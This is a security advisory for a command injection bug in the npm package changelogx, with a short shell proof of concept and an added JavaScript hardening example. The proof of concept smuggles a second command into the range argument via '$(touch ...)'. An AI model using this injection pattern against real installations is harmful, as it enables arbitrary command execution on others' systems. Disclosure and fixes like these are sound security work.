changelogx

vulnerability command injection
severity 7.3
language javascript
registry npm

✍️ Description

The git_helper.getCommits() function in the changelogx package, which is expected to execute a git log command, can have arbitrary other OS commands injected through its $range argument.

🕵️‍♂️ Proof of Concept

# PoC.sh
npm i changelogx -g

git clone https://github.com/royriojas/changelogx.git
cd changelogx

ls
# pzhou@shu is not listed yet
changelogx -r '1.0..;$(touch pzhou@shu)' -o changelog.html
ls
# pzhou@shu is now listed

💥 Impact

This vulnerability allows arbitrary OS commands to be executed through changelogx.
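
One way to close this class of bug, shown as an added example that is not changelogx's own code: validate the range against an allow-list and pass it to git as an argv element with execFile, so no shell ever parses it. The names SAFE_RANGE, unsafeCommand, gitLogArgs and getCommitsSafe, the log format string and the allow-list policy are all assumptions made for illustration.

```javascript
// Added example; not changelogx source. All function names are hypothetical.
const { execFile } = require('node:child_process');

// Conservative allow-list for a revision range such as "1.0..",
// "v1.0.0..v1.2.0" or "HEAD~5..HEAD". The first character may not be "-",
// so the value can never be parsed by git as an option, and no shell
// metacharacter (; $ ( ) ` | & space ...) is accepted. Forms such as
// "HEAD@{1}" are rejected by this assumed policy.
const SAFE_RANGE = /^[A-Za-z0-9.][A-Za-z0-9._\/~^-]{0,199}$/;

// Shape of the vulnerable pattern: the range is pasted into a string that
// child_process.exec() would hand to /bin/sh. Returned here, never executed.
function unsafeCommand(range) {
  return 'git log --pretty=format:"%h %s" ' + range;
}

// Hardened form: validate, then build an argv array.
function gitLogArgs(range) {
  if (typeof range !== 'string' || !SAFE_RANGE.test(range)) {
    throw new TypeError('invalid revision range');
  }
  // Trailing "--" tells git the preceding word is a revision, not a path.
  return ['log', '--pretty=format:%h %s', range, '--'];
}

// execFile() starts git directly with the argv array; no shell parses it.
function getCommitsSafe(range, cwd, callback) {
  let args;
  try {
    args = gitLogArgs(range);
  } catch (err) {
    return callback(err);
  }
  execFile('git', args, { cwd, maxBuffer: 16 * 1024 * 1024 }, (err, stdout) => {
    if (err) return callback(err);
    callback(null, stdout.split('\n').filter(Boolean));
  });
}
```

With this in place the range from the proof of concept is rejected before git is started, while ordinary ranges such as 1.0.. still work.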
